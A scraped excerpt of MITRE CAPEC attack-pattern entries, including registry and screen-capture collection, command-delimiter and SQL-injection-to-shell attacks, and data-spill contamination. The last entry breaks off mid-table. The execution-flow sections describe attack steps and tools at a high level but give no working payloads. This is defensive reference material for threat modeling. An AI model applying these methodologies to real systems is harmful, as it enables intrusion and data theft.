ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	150	Collect Data from Common Resource Locations

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Gain logical access to system: An adversary must first gain logical access to the system it wants to gather registry information from,
Techniques
Obtain user account credentials and access the system
Plant malware on the system that will give remote logical access to the adversary

Experiment

Determine if the permissions are correct: Once logical access is gained, an adversary will determine if they have the proper permissions, or are authorized, to view registry information. If they do not, they will need to escalate privileges on the system through other means
Peruse registry for information: Once an adversary has access to a registry, they will gather all system-specific data and sensitive information that they deem useful.

Exploit

Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

Prerequisites

The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system).

The adversary must have capability to navigate the operating system to peruse the registry.

Skills Required

[Level: Low]

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Employ a robust and layered defensive posture in order to prevent unauthorized users on your system.

Employ robust identification and audit/blocking via using an allowlist of applications on your system. Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern.

Related Weaknesses

CWE-ID	Weakness Name
285	Improper Authorization

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1005	Data from Local System
1012	Query Registry
1552.002	Unsecured Credentials: Credentials in Registry

Content History

Submissions
Submission Date	Submitter	Organization
2018-05-15 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2018-05-15 (Version 2.11)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Taxonomy_Mappings
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations, Related_Attack_Patterns, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-648: Collect Data from Screen Capture

Attack Pattern ID: 648

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	150	Collect Data from Common Resource Locations

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system).

Skills Required

[Level: Low]

Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only to leverage the relevant command for screen capture.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using allowlist tools.

While screen capture is a legitimate and practical function, certain situations and context may require the disabling of this feature.

Related Weaknesses

CWE-ID	Weakness Name
267	Privilege Defined With Unsafe Actions

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1113	Screen Capture
1513	Screen Capture

Content History

Submissions
Submission Date	Submitter	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team
2018-07-31 (Version 2.12)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations, Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-15: Command Delimiters

Attack Pattern ID: 15

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	137	Parameter Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	460	HTTP Parameter Pollution (HPP)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Assess Target Runtime Environment: In situations where the runtime environment is not implicitly known, the attacker makes connections to the target system and tries to determine the system's runtime environment. Knowing the environment is vital to choosing the correct delimiters.

Techniques
Port mapping using network connection-based software (e.g., nmap, nessus, etc.)
Port mapping by exploring the operating system (netstat, sockstat, etc.)
TCP/IP Fingerprinting
Induce errors to find informative error messages

Survey the Application: The attacker surveys the target application, possibly as a valid and authenticated user
Techniques
Spidering web sites for all available links
Inventory all application inputs

Experiment

Attempt delimiters in inputs: The attacker systematically attempts variations of delimiters on known inputs, observing the application's response each time.

Techniques
Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)
Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)
Enter command delimiters directly in input fields.

Exploit

Use malicious command delimiters: The attacker uses combinations of payload and carefully placed command delimiters to attack the software.

Prerequisites

Software's input validation or filtering must not detect and block presence of additional malicious command.

Skills Required

[Level: Medium]

The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session.

Resources Required

Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality	Read Data

Mitigations

Design: Perform allowlist validation against a positive specification for command length, type, and parameters.

Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account

Implementation: Perform input validation for all remote content.

Implementation: Use type conversions such as JDBC prepared statements.

Example Instances

By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target's inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.

LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database.

Related Weaknesses

CWE-ID	Weakness Name
146	Improper Neutralization of Expression/Command Delimiters
77	Improper Neutralization of Special Elements used in a Command ('Command Injection')
184	Incomplete List of Disallowed Inputs
78	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
185	Incorrect Regular Expression
93	Improper Neutralization of CRLF Sequences ('CRLF Injection')
140	Improper Neutralization of Delimiters
157	Failure to Sanitize Paired Delimiters
138	Improper Neutralization of Special Elements
154	Improper Neutralization of Variable Name Delimiters
697	Incorrect Comparison

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Mitigations
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses

CAPEC-248: Command Injection

Attack Pattern ID: 248

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	40	Manipulating Writeable Terminal Devices
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	66	SQL Injection
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	88	OS Command Injection
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	136	LDAP Injection
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	183	IMAP/SMTP Command Injection
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	250	XML Injection
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	676	NoSQL Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

The target application must accept input from the user and then use this input in the construction of commands to be executed. In virtually all cases, this is some form of string input that is concatenated to a constant string defined by the application to form the full command to be executed.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

All user-controllable input should be validated and filtered for potentially unwanted characters. Using an allowlist for input is desired, but if use of a denylist approach is necessary, then focusing on command related terms and delimiters is necessary.

Input should be encoded prior to use in commands to make sure command related characters are not treated as part of the command. For example, quotation characters may need to be encoded so that the application does not treat the quotation as a delimiter.

Input should be parameterized, or restricted to data sections of a command, thus removing the chance that the input will be treated as part of the command itself.

Related Weaknesses

CWE-ID	Weakness Name
77	Improper Neutralization of Special Elements used in a Command ('Command Injection')

Taxonomy Mappings

Relevant to the OWASP taxonomy mapping

Entry Name
Command Injection

References

[REF-615] "OWASP Web Security Testing Guide". Testing for Command Injection. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description, Description Summary, Solutions_and_Mitigations
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings

CAPEC-108: Command Line Execution through SQL Injection

Attack Pattern ID: 108

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	66	SQL Injection
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	110	SQL Injection through SOAP Parameter Tampering

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Probe for SQL Injection vulnerability: The attacker injects SQL syntax into user-controllable data inputs to search unfiltered execution of the SQL syntax in a query.

Exploit

Achieve arbitrary command execution through SQL Injection with the MSSQL_xp_cmdshell directive: The attacker leverages a SQL Injection attack to inject shell code to be executed by leveraging the xp_cmdshell directive.
Inject malicious data in the database: Leverage SQL injection to inject data in the database that could later be used to achieve command injection if ever used as a command line argument
Trigger command line execution with injected arguments: The attacker causes execution of command line functionality which leverages previously injected database content as arguments.

Prerequisites

The application does not properly validate data before storing in the database

Backend application implicitly trusts the data stored in the database

Malicious data is used on the backend as a command line argument

Skills Required

[Level: High]

The attacker most likely has to be familiar with the internal functionality of the system to launch this attack. Without that knowledge, there are not many feedback mechanisms to give an attacker the indication of how to perform command injection or whether the attack is succeeding.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Availability	Unreliable Execution
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

Disable MSSQL xp_cmdshell directive on the database

Properly validate the data (syntactically and semantically) before writing it to the database.

Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. as a command line argument).

Example Instances

SQL injection vulnerability in Cacti 0.8.6i and earlier, when register_argc_argv is enabled, allows remote attackers to execute arbitrary SQL commands via the (1) second or (2) third arguments to cmd.php. NOTE: this issue can be leveraged to execute arbitrary commands since the SQL query results are later used in the polling_items array and popen function (CVE-2006-6799).

Reference: https://www.cve.org/CVERecord?id=CVE-2006-6799

Related Weaknesses

CWE-ID	Weakness Name
89	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation
78	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
114	Process Control

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-216: Communication Channel Manipulation

Attack Pattern ID: 216

Abstraction: Meta

View customized information:

Description

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	12	Choosing Message Identifier
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	217	Exploiting Incorrectly Configured SSL/TLS
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	94	Adversary in the Middle (AiTM)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

The target application must leverage an open communications channel.

The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94).

Resources Required

A tool that is capable of viewing network traffic and generating custom inputs to be used in the attack.

Consequences

Scope	Impact	Likelihood
Integrity	Read Data Modify Data Other
Confidentiality	Read Data

Mitigations

Encrypt all sensitive communications using properly-configured cryptography.

Design the communication system such that it associates proper authentication/authorization with each channel/message.

Related Weaknesses

CWE-ID	Weakness Name
306	Missing Authentication for Critical Function

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Attack_Prerequisites, Description Summary, Related_Attack_Patterns
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Resources_Required, Solutions_and_Mitigations
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Prerequisites
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Attack_Patterns, Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Abuse of Communication Channels

CAPEC-623: Compromising Emanations Attack

Attack Pattern ID: 623

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	189	Black Box Reverse Engineering

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

Proximal access to the device.

Skills Required

[Level: High]

Sophisticated attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

None are known.

Related Weaknesses

CWE-ID	Weakness Name
201	Insertion of Sensitive Information Into Sent Data

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences

CAPEC-176: Configuration/Environment Manipulation

Attack Pattern ID: 176

Abstraction: Meta

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	75	Manipulating Writeable Configuration Files
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	203	Manipulate Registry Information
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	271	Schema Poisoning
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	536	Data Injected During Configuration
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	578	Disable Security Software

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The target application must consult external files or configuration controls to control its execution. All but the very simplest applications meet this requirement.

Resources Required

The attacker must have the access necessary to affect the files or other environment items the targeted application uses for its operations.

Related Weaknesses

CWE-ID	Weakness Name
15	External Control of System or Configuration Setting
1233	Security-Sensitive Hardware Controls with Missing Lock Bit Protection
1234	Hardware Internal or Debug Modes Allow Override of Locks
1304	Improperly Preserved Integrity of Hardware Configuration State During a Power Save/Restore Operation
1328	Security Version Number Mutable to Older Versions

Taxonomy Mappings

Relevant to the OWASP taxonomy mapping

Entry Name
Setting Manipulation

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Configuration/Environment manipulation

CAPEC-595: Connection Reset

Attack Pattern ID: 595

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	594	Traffic Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	596	TCP RST Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

This attack requires the ability to monitor the target's network connection.

Related Weaknesses

CWE-ID	Weakness Name
940	Improper Verification of Source of a Communication Channel

Content History

Submissions
Submission Date	Submitter	Organization
2017-01-04 (Version 2.8)	Seamus Tuohy
2017-01-04 (Version 2.8)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses

CAPEC-548: Contaminate Resource

Attack Pattern ID: 548

Abstraction: Meta

View customized information:

Description

Extended Description

Contamination through email is a very common attack vector. Systems with email servers or personal work systems using email are susceptible to this attack simply by receiving an email that contains a classified document or information. A fake classified document could even be used that is mistaken as true classified material. This would still cause the system to be taken offline until the validity of the classified material is confirmed.

Alternate Terms

Term: Data Spill

When information is handled by an information system of a classification/sensitivity for which the system has not been authorized to handle.

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	607	Obstruction

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The adversary needs to have real or fake classified/sensitive information to place on a system

Skills Required

[Level: Low]

Knowledge of classification levels of systems

[Level: High]

The ability to obtain a classified document or information

[Level: Low]

The ability to fake a classified document

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption
Confidentiality	Read Data

Mitigations

Properly safeguard classified/sensitive data. This includes training cleared individuals to ensure they are handling and disposing of this data properly, as well as ensuring systems only handle information of the classification level they are designed for.

Design systems with redundancy in mind. This could mean creating backing servers that could be switched over to in the event that a server has to be taken down for investigation.

Have a planned and efficient response plan to limit the amount of time a system is offline while the contamination is investigated.

Example Instances

An insider threat was able to obtain a classified document. They have knowledge that a backend server which provides access to a website also runs a mail server. The adversary creates a throwaway email address and sends the classified document to the mail server. When an administrator checks the mail server they notice that it has processed an email with a classified document and the server has to be taken offline while they investigate the contamination. In the meantime, the website has to be taken down as well and access to the website is denied until the backend can be migrated to another server or the investigation is complete.

Related Weaknesses

General: This attack pattern does not depend upon an underlying system, application, or component weakness and, therefore, cannot be mapped to the Common Weakness Enumeration (CWE) body of knowledge.

References

[REF-742] Florida Industrial Security Working Group (FISWG). "Managing a “Data Spill”". <https://fiswg.research.ucf.edu/Documents/PPT/Manage%20a%20Data%20Spill-Contamination%20September%202015.pptx>. URL validated: 2022-10-31.

[REF-743] "data spillage". <https://csrc.nist.gov/glossary/term/data_spillage>. URL validated: 2022-10-31.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Alternate_Terms, Consequences, Description, Example_Instances, Extended_Description, Likelihood_Of_Attack, Mitigations, Prerequisites, References, Related_Attack_Patterns, Skills_Required, Typical_Severity

CAPEC-148: Content Spoofing

Attack Pattern ID: 148

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	145	Checksum Spoofing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	218	Spoofing of UDDI/ebXML Messages
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	502	Intent Spoof
